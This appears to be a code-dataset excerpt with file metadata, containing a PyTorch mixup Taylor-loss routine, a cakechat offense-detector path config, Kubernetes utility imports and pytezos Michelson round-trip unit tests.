# extract number of total pixels for images
img_size = int(images.numel() / N)
# extract original batch shape
batch_shape = images.shape
# flatten input images
images_flat = images.reshape((N, img_size))
mu_img_flat = mu_img.reshape((1, img_size))
num_classes = labels.max() + 1
# Y is a stack of rows, where each row is the one_hot version
# of the correct label
Y = torch.zeros((N, num_classes)).cuda()
Y[np.arange(N), labels] = 1
# COMPUTE raw tilde loss (term 1)
# we assume uniform distribution
theta_bar = 0.75*torch.ones((1)).cuda()
# matrix form for x_theta over whole batch
Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
# same for y_tilde
Yt = (1 - theta_bar)*mu_y + theta_bar*Y
# torch.save(Xt, 'Xt.pt')
# torch.save(Yt, 'Yt.pt')
loss = (1/N)*cross_entropy_manual(model(Xt.reshape(batch_shape)), Yt)
# COMPUTE delta delta term (term 2)
# first compute the data-dependent part.
V = (images_flat - mu_img_flat).detach().clone()
# compute the data dependent component of inner product
data_dependent = hess_quadratic(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', V, V)
# extract number of singular values extracted from global covariance matrix
num_components = Sxx.numel()
data_independent = torch.zeros((1)).cuda()
for i in range(num_components):
data_independent += hess_svd(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', Sxx[i]*Uxx[:,i].reshape((1, img_size)), Vxx[:,i].reshape((1, img_size)))
var_half_mixup = 0.5**2 / 12
gamma_squared = var_half_mixup + (1 - theta_bar)**2
ddterm = 0.5*(var_half_mixup*data_dependent + gamma_squared * data_independent)
# COMPUTE epsilon delta "cross-term" (term 3)
# first compute the data-dependent part.
W = (Y - mu_y).detach().clone()
# compute the data dependent component of inner product
data_dependent_cross = hess_quadratic(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', V, W)
# extract number of singular values extracted from global covariance matrix
num_components = Sxy.numel()
data_independent_cross = torch.zeros((1)).cuda()
for i in range(num_components):
data_independent_cross += hess_svd(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', Sxy[i]*Uxy[:,i].reshape((1, img_size)), Vxy[:,i].reshape((1, num_classes)))
edterm = var_half_mixup*data_dependent_cross + gamma_squared * data_independent_cross
# update num components
num_components = T_S[0,:].numel()
# COMPUTE epsilon delta delta "3-term" (term 4, new)
hess_quad_innerprod = torch.zeros((1)).cuda()
# sum over classes
for i in range(num_classes):
# sum over all compoments we take from T_a matrices
for j in range(num_components):
hess_quad_innerprod += hess_svd_ed2(
i, model, batch_shape, Xt, Xt, 'x', 'x', T_S[i, j]*T_U[i, :, j].reshape((1, img_size)), T_V[i,:,j].reshape((1, img_size)))
eddterm = -0.5 * ((1-theta_bar)**3) * hess_quad_innerprod
return loss, ddterm, edterm, eddterm
# returns regularization (non-loss) terms
def taylor_loss_base(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
# extract batch size
N = images.shape[0]
# extract number of total pixels for images
img_size = int(images.numel() / N)
# extract original batch shape
batch_shape = images.shape
# flatten input images
images_flat = images.reshape((N, img_size))
mu_img_flat = mu_img.reshape((1, img_size))
num_classes = labels.max() + 1
# Y is a stack of rows, where each row is the one_hot version
# of the correct label
Y = torch.zeros((N, num_classes)).cuda()
Y[np.arange(N), labels] = 1
# COMPUTE raw tilde loss (term 1)
# we assume uniform distribution
theta_bar = 0.75*torch.ones((1)).cuda()
# matrix form for x_theta over whole batch
Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
# same for y_tilde
Yt = (1 - theta_bar)*mu_y + theta_bar*Y
# torch.save(Xt, 'Xt.pt')
# torch.save(Yt, 'Yt.pt')
return (1/N)*cross_entropy_manual(model(Xt.reshape(batch_shape)), Yt)
# returns regularization (non-loss) terms
def taylor_loss_d2(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
# extract batch size
N = images.shape[0]
# extract number of total pixels for images
img_size = int(images.numel() / N)
# extract original batch shape
batch_shape = images.shape
# flatten input images
images_flat = images.reshape((N, img_size))
mu_img_flat = mu_img.reshape((1, img_size))
num_classes = labels.max() + 1
# Y is a stack of rows, where each row is the one_hot version
# of the correct label
Y = torch.zeros((N, num_classes)).cuda()
Y[np.arange(N), labels] = 1
# COMPUTE raw tilde loss (term 1)
# we assume uniform distribution
theta_bar = 0.75*torch.ones((1)).cuda()
# matrix form for x_theta over whole batch
Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
# same for y_tilde
Yt = (1 - theta_bar)*mu_y + theta_bar*Y
# COMPUTE delta delta term (term 2)
# first compute the data-dependent part.
V = (images_flat - mu_img_flat).detach().clone()
# compute the data dependent component of inner product
data_dependent = hess_quadratic(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', V, V)
# extract number of singular values extracted from global covariance matrix
num_components = Sxx.numel()
return_dict = {}
num_comps_to_compute = [1, 2, 5, 20, 50, 200]
var_half_mixup = 0.5**2 / 12
gamma_squared = var_half_mixup + (1 - theta_bar)**2
data_independent = torch.zeros((1)).cuda()
for i in range(num_components):
data_independent += hess_svd(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'x', Sxx[i]*Uxx[:,i].reshape((1, img_size)), Vxx[:,i].reshape((1, img_size)))
if num_comps_to_compute.count(i+1) > 0 : # if i is in comps_to_compute
return_dict[i+1] = (0.5*(var_half_mixup*data_dependent + gamma_squared * data_independent))
return return_dict
# returns regularization (non-loss) terms
def taylor_loss_de(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
# extract batch size
N = images.shape[0]
# extract number of total pixels for images
img_size = int(images.numel() / N)
# extract original batch shape
batch_shape = images.shape
# flatten input images
images_flat = images.reshape((N, img_size))
mu_img_flat = mu_img.reshape((1, img_size))
num_classes = labels.max() + 1
# Y is a stack of rows, where each row is the one_hot version
# of the correct label
Y = torch.zeros((N, num_classes)).cuda()
Y[np.arange(N), labels] = 1
# COMPUTE raw tilde loss (term 1)
# we assume uniform distribution
theta_bar = 0.75*torch.ones((1)).cuda()
# matrix form for x_theta over whole batch
Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
# same for y_tilde
Yt = (1 - theta_bar)*mu_y + theta_bar*Y
# COMPUTE delta delta term (term 2)
# first compute the data-dependent part.
V = (images_flat - mu_img_flat).detach().clone()
num_components = Sxx.numel()
return_dict = {}
num_comps_to_compute = [1, 2, 5, 20, 50, 200]
var_half_mixup = 0.5**2 / 12
gamma_squared = var_half_mixup + (1 - theta_bar)**2
# first compute the data-dependent part.
W = (Y - mu_y).detach().clone()
# compute the data dependent component of inner product
data_dependent_cross = hess_quadratic(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', V, W)
# extract number of singular values extracted from global covariance matrix
num_components = Sxy.numel()
data_independent_cross = torch.zeros((1)).cuda()
for i in range(num_components):
data_independent_cross += hess_svd(
lambda x, y : cross_entropy_manual(x, y), model, batch_shape, Xt, Yt, 'x', 'y', Sxy[i]*Uxy[:,i].reshape((1, img_size)), Vxy[:,i].reshape((1, num_classes)))
return var_half_mixup*data_dependent_cross + gamma_squared * data_independent_cross
# returns regularization (non-loss) terms
def taylor_loss_d2e(images, labels, model, mu_img, mu_y, Uxx, Sxx, Vxx, Uxy, Sxy, Vxy, T_U, T_S, T_V):
# extract batch size
N = images.shape[0]
# extract number of total pixels for images
img_size = int(images.numel() / N)
# extract original batch shape
batch_shape = images.shape
# flatten input images
images_flat = images.reshape((N, img_size))
mu_img_flat = mu_img.reshape((1, img_size))
num_classes = labels.max() + 1
# Y is a stack of rows, where each row is the one_hot version
# of the correct label
Y = torch.zeros((N, num_classes)).cuda()
Y[np.arange(N), labels] = 1
# COMPUTE raw tilde loss (term 1)
# we assume uniform distribution
theta_bar = 0.75*torch.ones((1)).cuda()
# matrix form for x_theta over whole batch
Xt = (1 - theta_bar)*mu_img_flat + theta_bar*images_flat
# same for y_tilde
Yt = (1 - theta_bar)*mu_y + theta_bar*Y
# COMPUTE delta delta term (term 2)
# first compute the data-dependent part.
V = (images_flat - mu_img_flat).detach().clone()
# extract number of singular values extracted from global covariance matrix
num_components = Sxx.numel()
var_half_mixup = 0.5**2 / 12
gamma_squared = var_half_mixup + (1 - theta_bar)**2
# update num components
num_components = T_S[0,:].numel()
return_dict = {}
num_comps_to_compute = [1, 2, 5, 20, 50, 200]
hess_quad_innerprod = torch.zeros((1)).cuda()
# sum over components
for j in range(num_components):
# sum over classes
for i in range(num_classes):
hess_quad_innerprod += hess_svd_ed2(
i, model, batch_shape, Xt, Xt, 'x', 'x', T_S[i, j]*T_U[i, :, j].reshape((1, img_size)), T_V[i,:,j].reshape((1, img_size)))
if num_comps_to_compute.count(j+1) > 0:
return_dict[j+1] = -0.5 * ((1-theta_bar)**3) * hess_quad_innerprod
return return_dict
| 36.07078
| 167
| 0.660579
| 3,197
| 19,875
| 3.961526
| 0.108539
| 0.020213
| 0.021477
| 0.017766
| 0.758626
| 0.75152
| 0.736992
| 0.733044
| 0.711488
| 0.676352
| 0
| 0.018364
| 0.221887
| 19,875
| 551
| 168
| 36.07078
| 0.800582
| 0.37912
| 0
| 0.767932
| 0
| 0
| 0.002303
| 0
| 0
| 0
| 0
| 0.001815
| 0.004219
| 1
| 0.050633
| false
| 0
| 0.012658
| 0
| 0.113924
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bedf33b41e91389e1709d0e3f79f3bfae03ddea1
| 259
|
py
|
Python
|
cakechat/utils/offense_detector/config.py
|
timmoti/cakechat
|
97f14e3f12c92edb30ed385fe93e7e3944bcd298
|
[
"Apache-2.0"
] | 1
|
2018-05-15T09:18:19.000Z
|
2018-05-15T09:18:19.000Z
|
cakechat/utils/offense_detector/config.py
|
hooram/cakechat
|
92b0957329738b9480f36f62d63876ed758208c5
|
[
"Apache-2.0"
] | 64
|
2019-07-05T06:06:43.000Z
|
2021-08-02T05:22:31.000Z
|
cakechat/utils/offense_detector/config.py
|
timmoti/cakechat
|
97f14e3f12c92edb30ed385fe93e7e3944bcd298
|
[
"Apache-2.0"
] | 1
|
2018-10-14T04:14:41.000Z
|
2018-10-14T04:14:41.000Z
|
import os
import pkg_resources
import cakechat.utils.offense_detector
OFFENSIVE_PHRASES_PATH = pkg_resources.resource_filename(cakechat.utils.offense_detector.__name__,
'/data/offensive_phrases.csv')
| 32.375
| 98
| 0.675676
| 26
| 259
| 6.269231
| 0.615385
| 0.147239
| 0.245399
| 0.343558
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.266409
| 259
| 7
| 99
| 37
| 0.857895
| 0
| 0
| 0
| 0
| 0
| 0.104247
| 0.104247
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
bef78df01329d22337eafd0938c56e0973260729
| 283
|
py
|
Python
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 4
|
2017-03-18T12:16:40.000Z
|
2020-11-12T06:59:29.000Z
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 18
|
2016-09-22T08:01:02.000Z
|
2020-07-15T08:30:17.000Z
|
utils/kubernetes/__init__.py
|
StackVista/sts-agent
|
f8358ea46820ffb9eb0b4b30c7d7457cc2cc987a
|
[
"BSD-3-Clause"
] | 8
|
2016-11-23T06:55:51.000Z
|
2021-07-05T05:12:34.000Z
|
from .leader_elector import LeaderElector # noqa: F401
from .kube_event_retriever import KubeEventRetriever # noqa: F401
from .pod_service_mapper import PodServiceMapper # noqa: F401
from .kubeutil import detect_is_k8s # noqa: F401
from .kubeutil import KubeUtil # noqa: F401
| 40.428571
| 66
| 0.798587
| 37
| 283
| 5.918919
| 0.513514
| 0.182648
| 0.219178
| 0.182648
| 0.237443
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06639
| 0.14841
| 283
| 6
| 67
| 47.166667
| 0.842324
| 0.190813
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
befcf7d54065c34019a35095a58f037c15ecc9ef
| 9,443
|
py
|
Python
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2020-08-11T02:31:24.000Z
|
2020-08-11T02:31:24.000Z
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2020-12-30T16:44:56.000Z
|
2020-12-30T16:44:56.000Z
|
tests/contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/test_michelson_coding_KT1Gqy.py
|
juztin/pytezos-1
|
7e608ff599d934bdcf129e47db43dbdb8fef9027
|
[
"MIT"
] | 1
|
2022-03-20T19:01:00.000Z
|
2022-03-20T19:01:00.000Z
|
from unittest import TestCase
from tests import get_data
from pytezos.michelson.micheline import michelson_to_micheline
from pytezos.michelson.formatter import micheline_to_michelson
class MichelsonCodingTestKT1Gqy(TestCase):
def setUp(self):
self.maxDiff = None
def test_michelson_parse_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_code_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/code_KT1Gqy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_storage_KT1Gqy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/storage_KT1Gqy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_op1vDy(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_op1vDy.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooqAps(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooqAps.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_onu43U(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_onu43U.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_oo6Wkn(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_oo6Wkn.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooHqAk(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooHqAk.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooU8MM(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooU8MM.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
def test_michelson_parse_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json')
actual = michelson_to_micheline(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.tz'))
self.assertEqual(expected, actual)
def test_michelson_format_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.tz')
actual = micheline_to_michelson(get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json'),
inline=True)
self.assertEqual(expected, actual)
def test_michelson_inverse_parameter_ooBcbW(self):
expected = get_data(
path='contracts/KT1GqyAwGGqUbrduNgn4c4aVUXU9UGnXwNmD/parameter_ooBcbW.json')
actual = michelson_to_micheline(micheline_to_michelson(expected))
self.assertEqual(expected, actual)
| 46.9801
| 90
| 0.733983
| 880
| 9,443
| 7.563636
| 0.05
| 0.048377
| 0.074369
| 0.135216
| 0.963341
| 0.963341
| 0.963341
| 0.963341
| 0.947416
| 0.947416
| 0
| 0.031037
| 0.191359
| 9,443
| 200
| 91
| 47.215
| 0.840623
| 0
| 0
| 0.639053
| 0
| 0
| 0.316531
| 0.316531
| 0
| 0
| 0
| 0
| 0.159763
| 1
| 0.16568
| false
| 0
| 0.023669
| 0
| 0.195266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
831962ebd3fea680260d545014e6784b1cba6901
| 26
|
py
|
Python
|
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/__init__.py
|
GarnerCorp/python-terrascript
|
ec6c2d9114dcd3cb955dd46069f8ba487e320a8c
|
[
"BSD-2-Clause"
] | 1
|
2018-11-15T16:23:05.000Z
|
2018-11-15T16:23:05.000Z
|
"""2019-05-28 10:50:46"""
| 13
| 25
| 0.538462
| 6
| 26
| 2.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.583333
| 0.076923
| 26
| 1
| 26
| 26
| 0
| 0.730769
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
831b15f3b3c6e6a289776af8ddb4e57729a1076a
| 22
|
py
|
Python
|
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | 1
|
2020-05-16T02:59:32.000Z
|
2020-05-16T02:59:32.000Z
|
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | null | null | null |
ASTeditor/new.py
|
skylerberg/ASTeditor
|
55a2d3c53986174cb12e5269fff21c5e4fedf67c
|
[
"Apache-2.0"
] | null | null | null |
def new():
pass
| 4.4
| 10
| 0.454545
| 3
| 22
| 3.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.409091
| 22
| 4
| 11
| 5.5
| 0.769231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 6
|
832f51379b1095cd19da1da28f558558d4fa7d90
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
Retraces/UkraineBot
|
3d5d7f8aaa58fa0cb8b98733b8808e5dfbdb8b71
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/numpy/core/tests/test_custom_dtypes.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/25/db/ed/09935f2ff2ae669ac4e6d9d92111e650da1d08849833b05128e4394194
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.458333
| 0
| 96
| 1
| 96
| 96
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
83343a8bc9268d81d1649edf44e25372c0339b82
| 22
|
py
|
Python
|
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
vincent_crons/__init__.py
|
EVEprosper/vincent-lexicon
|
dad65564f7e1a3cc97af9f2ea9592025cb83df5c
|
[
"MIT"
] | null | null | null |
from . import GetNews
| 11
| 21
| 0.772727
| 3
| 22
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
